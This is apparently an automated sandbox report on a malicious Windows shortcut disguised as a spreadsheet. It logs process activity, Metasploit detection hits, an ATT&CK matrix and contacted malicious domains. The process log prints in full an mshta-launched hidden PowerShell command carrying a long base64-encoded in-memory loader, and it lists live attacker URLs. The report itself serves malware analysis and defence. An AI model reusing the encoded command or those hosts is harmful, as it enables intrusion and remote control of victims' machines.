Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -encodedcommand jabzad0atgblahcalqbpagiaagblagmadaagaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgalabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciasaa0ahmasqbbaeeaqqbbaeeaqqbbaeealwa2adeawabhadmatwbpahoaqgbmacsasabiadgargbiadeaswbsafyaawb3ae8aeabnahyacqbuagsacgbwaekaaabmaeyaqqbkaecatabsaduazwazagwavqbjafkarqbsagsaqgbzafiarabkahualwb2agyavaa0ae8ayqb6afoanqboahoadabtaheaywa2ahkaaqbiaecayqbtahuanqa5acsacabyahuabgbnafiaqwa1ae4aawbqahmamgbvafeasgbiafuaugbkafqamqbhagmazqbhaeyaqqazafyawqbxagwamqb2aewaugb4aduasgbrahuacqbpacsababhahqacgboaewaqqbkahmavgbtae0awaboahgarqbyag0asga0ahqaqgarahmaugb3ag4augbragwaqwavafyamga1aecargb1ahgadabhafyacqbsadmacwbyagyadabtaecavabvahaaugbnahkacabmagkabwazaekauwbxae4avqb2adcaaqbvafgasgbsafqayqbaaeiawqblac8auqbtafcatqbuagiabwa1agmadabjahuadgbrafmaywbcafeanwbzag0atgbjagoanwbjafcabaa3ahcalwbqafuacgbsadgawqb4aemacwbqahgalwbxageaqqbdaeoacwbrageatab2aeuasabrahaacqbkaguabwa3ae4avgb1agoarwbgadaalwbmaeqazgbjaeoadabuagyamqbpafgatab6afeaqwbiafmadwb1agyadab1afcaywbaagealwbcaesavabaahcaaqbqafuanqb0aesamwbdagcaeabzagoadwboadyacabwagyalwa2aheamqbwac8adqbtageazqbiadqaugbkageadqbhagsavgbqafgaeqboaesarab0agoawqboahgadabvadcaoqbxaeiaywbhahoavab4aemadabhahiaaqayafgarwbzaggaqwb0ahkatqavae8aqwa1ahuamwboahaarqbtahyabab1aemavgbjac8awgbxac8azqbtafoarwaxag4azwb4acsazabpaeyababxafaatqbyafuacqbeae0azgbbaeqawab2agsacwboaheazwbuagcacaa3afqaoaavafaamqbmagmamwboaegabwbhaeuarwaraewaygbxafmaqqbvaeqaaqbnaeqaqgbuahyauabsahmababoadaatqbyagmarabeafmamabrahiarqbxagcaawbjafkazqbcafcangb3aeeaaqbsagkauwboaeeakwbxae0aqgblafqamgbvafkaoqbxagwamabhaesaywbrafaamabqahyamgbwadmadqblageaaqbyaekaegb1afgaoabxafyasabzahyaqgbmahyarwbkaesanaazafqaagbiahgasgazafeabwbaagqadwbjadeawqbfadcadga2aeyalwbgadeaeaaxacsauaawafcawqbqafgaswbqadgabwbiag8azqbvagcaagbgahkatabvaeiaywbdac8ataa2aewamqbjahiargb4afyatqa1afiatwbcafaaygbsahcabqbyagkabaazafiaoqbfae4auwbnaeuauqbgagcabgbqahyaraboae8atqawaduaugavagyabgbuacsaugb6ae4abgbpafcavab4aheazqblag0atabqafuauwblafoanabqaeuaywbjagqaoqbuafqatgbqafmaywa1adgacabgahyawablaesabgbtaewakwbaafoabaa2adiarqbgahgacwbmaduanqboahyaqgbvaduauqbxaekaegb3ae4acga2adkabgbuagcaswa5adkazabhafoabwboafyasabkahgaoaaxaduabqb3ag8anabhadkawabuaeeabgbmadqarqb6ahyavgbnahqaqwbuadmaoabxaeuacgbvagyazqbaafaadabiagmaswb3ae4anqa1adqaqqblagcaaqbkacsacqa5agcaagbtagqawqbxadaacqbcagcacgbiaeeamwavaeuazab3ahyaugb5aeiavwbtaecaegbyahqauabxafoavwbmahiaugbmahyaugbtahgaegayaeuacqbtaeiaagbwae8asqbjac8adabcag0avqbnaemaeqbpag4auqbiaeyaqga0ahaamgbxadiasgbtaeuanqbiaeqangbfadyangbtafkadqbmafoavgbraewatwa2ahaanwbyaegamqbcadyatqbzadiargbbafcaugbnageacwbqahaaqqbnadiabqbfafmasabiahmamwbeaeiauwbvae0ayqblagcanwbxaduanabiag4abgbpaeyavqbqacsauwbfahmaegbdaecababbae4atgblahoazwbuag0aqwbtadqatqbfagcaugbnadcasabuacsauabmadqacqboadgawqbpaeuaagbiaemaswbnahqanwbdadyacgbraekazwb0aeyamgbyae8aswbhafaaswbjaewatgbjaduargbuac8aqqarahgaegbuaggaeqbuag8adqbeaheavab
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -w hidden -encodedcommand jabzad0atgblahcalqbpagiaagblagmadaagaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgalabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciasaa0ahmasqbbaeeaqqbbaeeaqqbbaeealwa2adeawabhadmatwbpahoaqgbmacsasabiadgargbiadeaswbsafyaawb3ae8aeabnahyacqbuagsacgbwaekaaabmaeyaqqbkaecatabsaduazwazagwavqbjafkarqbsagsaqgbzafiarabkahualwb2agyavaa0ae8ayqb6afoanqboahoadabtaheaywa2ahkaaqbiaecayqbtahuanqa5acsacabyahuabgbnafiaqwa1ae4aawbqahmamgbvafeasgbiafuaugbkafqamqbhagmazqbhaeyaqqazafyawqbxagwamqb2aewaugb4aduasgbrahuacqbpacsababhahqacgboaewaqqbkahmavgbtae0awaboahgarqbyag0asga0ahqaqgarahmaugb3ag4augbragwaqwavafyamga1aecargb1ahgadabhafyacqbsadmacwbyagyadabtaecavabvahaaugbnahkacabmagkabwazaekauwbxae4avqb2adcaaqbvafgasgbsafqayqbaaeiawqblac8auqbtafcatqbuagiabwa1agmadabjahuadgbrafmaywbcafeanwbzag0atgbjagoanwbjafcabaa3ahcalwbqafuacgbsadgawqb4aemacwbqahgalwbxageaqqbdaeoacwbrageatab2aeuasabrahaacqbkaguabwa3ae4avgb1agoarwbgadaalwbmaeqazgbjaeoadabuagyamqbpafgatab6afeaqwbiafmadwb1agyadab1afcaywbaagealwbcaesavabaahcaaqbqafuanqb0aesamwbdagcaeabzagoadwboadyacabwagyalwa2aheamqbwac8adqbtageazqbiadqaugbkageadqbhagsavgbqafgaeqboaesarab0agoawqboahgadabvadcaoqbxaeiaywbhahoavab4aemadabhahiaaqayafgarwbzaggaqwb0ahkatqavae8aqwa1ahuamwboahaarqbtahyabab1aemavgbjac8awgbxac8azqbtafoarwaxag4azwb4acsazabpaeyababxafaatqbyafuacqbeae0azgbbaeqawab2agsacwboaheazwbuagcacaa3afqaoaavafaamqbmagmamwboaegabwbhaeuarwaraewaygbxafmaqqbvaeqaaqbnaeqaqgbuahyauabsahmababoadaatqbyagmarabeafmamabrahiarqbxagcaawbjafkazqbcafcangb3aeeaaqbsagkauwboaeeakwbxae0aqgblafqamgbvafkaoqbxagwamabhaesaywbrafaamabqahyamgbwadmadqblageaaqbyaekaegb1afgaoabxafyasabzahyaqgbmahyarwbkaesanaazafqaagbiahgasgazafeabwbaagqadwbjadeawqbfadcadga2aeyalwbgadeaeaaxacsauaawafcawqbqafgaswbqadgabwbiag8azqbvagcaagbgahkatabvaeiaywbdac8ataa2aewamqbjahiargb4afyatqa1afiatwbcafaaygbsahcabqbyagkabaazafiaoqbfae4auwbnaeuauqbgagcabgbqahyaraboae8atqawaduaugavagyabgbuacsaugb6ae4abgbpafcavab4aheazqblag0atabqafuauwblafoanabqaeuaywbjagqaoqbuafqatgbqafmaywa1adgacabgahyawablaesabgbtaewakwbaafoabaa2adiarqbgahgacwbmaduanqboahyaqgbvaduauqbxaekaegb3ae4acga2adkabgbuagcaswa5adkazabhafoabwboafyasabkahgaoaaxaduabqb3ag8anabhadkawabuaeeabgbmadqarqb6ahyavgbnahqaqwbuadmaoabxaeuacgbvagyazqbaafaadabiagmaswb3ae4anqa1adqaqqblagcaaqbkacsacqa5agcaagbtagqawqbxadaacqbcagcacgbiaeeamwavaeuazab3ahyaugb5aeiavwbtaecaegbyahqauabxafoavwbmahiaugbmahyaugbtahgaegayaeuacqbtaeiaagbwae8asqbjac8adabcag0avqbnaemaeqbpag4auqbiaeyaqga0ahaamgbxadiasgbtaeuanqbiaeqangbfadyangbtafkadqbmafoavgbraewatwa2ahaanwbyaegamqbcadyatqbzadiargbbafcaugbnageacwbqahaaqqbnadiabqbfafmasabiahmamwbeaeiauwbvae0ayqblagcanwbxaduanabiag4abgbpaeyavqbqacsauwbfahmaegbdaecababbae4atgblahoazwbuag0aqwbtadqatqbfagcaugbnadcasabuacsauabmadqacqboadgawqbpaeuaagbiaemaswbnahqanwbdadyacgbraekazwb0aeyamgbyae8aswbhafaaswbjaewatgbjaduargbuac8aqqarahgaegbuaggaeqbuag8adqbeaheavab			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Remote Access Functionality

Yara detected Metasploit Payload

Source: Yara match	File source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected MetasploitPayload

Source: Yara match	File source: amsi64_7540.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7812.amsi.csv, type: OTHER
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C1D34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C082F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7812, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	111 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	41 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
____ ______.xls.lnk.bin.lnk	26%	ReversingLabs	Shortcut.Trojan.Pantera
____ ______.xls.lnk.bin.lnk	30%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ecols[1].hta	100%	Avira	VBS/Dldr.Agent.vrfx

Source	Detection	Scanner	Label
https://iplogger.cn/forensicsas.png/	100%	Avira URL Cloud	phishing
https://iplogger.cn/forensicsas.pngS_BROWSER_APP_	100%	Avira URL Cloud	phishing
http://ecols.ru/ecols.hta(	0%	Avira URL Cloud	safe
http://ecols.ru/ecols.hta...4	0%	Avira URL Cloud	safe
http://ecols.ru/ecols.htas.png~	0%	Avira URL Cloud	safe
http://ecols.ru/	0%	Avira URL Cloud	safe
http://ecols.ru/ecols.hta	0%	Avira URL Cloud	safe
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js:r	100%	Avira URL Cloud	malware
https://iplogger.cn/	100%	Avira URL Cloud	phishing
https://iplogger.cn/forensicsas.pngD	100%	Avira URL Cloud	phishing
https://iplogger.cn/forensicsas.png3	100%	Avira URL Cloud	phishing
http://ecols.ru/ecols.htaT	0%	Avira URL Cloud	safe
http://ecols.ru/ecols.htaY	0%	Avira URL Cloud	safe
https://iplogger.cn/forensicsas.png31536000	100%	Avira URL Cloud	phishing
https://iplogger.cn/forensicsas.pngf	100%	Avira URL Cloud	phishing
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js(r	100%	Avira URL Cloud	malware
http://ecols.ru/ecols.hta...	0%	Avira URL Cloud	safe
https://iplogger.cn/forensicsas.pnge	100%	Avira URL Cloud	phishing
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js	100%	Avira URL Cloud	malware
http://ecols.ru/ecols.htaX	0%	Avira URL Cloud	safe
http://ecols.ru/ecols.htaP	0%	Avira URL Cloud	safe
https://iplogger.cn/~	100%	Avira URL Cloud	phishing
https://mcnn.ru:8443/jquery-3.3.1.slim.min.js6V	100%	Avira URL Cloud	malware
https://iplogger.cn/forensicsas.png~	100%	Avira URL Cloud	phishing
http://ecols.ru/ecols.htaD	0%	Avira URL Cloud	safe
http://ecols.ru/ecols.htaru/ecols.htaA	0%	Avira URL Cloud	safe
https://iplogger.cn/forensicsas.png	100%	Avira URL Cloud	phishing
https://iplogger.cn/forensicsas.pngX	100%	Avira URL Cloud	phishing
https://mcnn.ru/	100%	Avira URL Cloud	malware
http://ecols.ru/ecols.htaTKC:	0%	Avira URL Cloud	safe
http://mcnn.ru/jquery-3.3.1.slim.min.js	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ecols.ru	91.218.228.26	true	false	unknown
iplogger.cn	172.67.160.19	true	true	unknown
mcnn.ru	190.2.146.205	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iplogger.cn/forensicsas.png	true	Avira URL Cloud: phishing	unknown
http://mcnn.ru/jquery-3.3.1.slim.min.js	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ecols.ru/ecols.htas.png~	mshta.exe, 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2087103662.000001B148958000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.2078431282.000001B148956000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
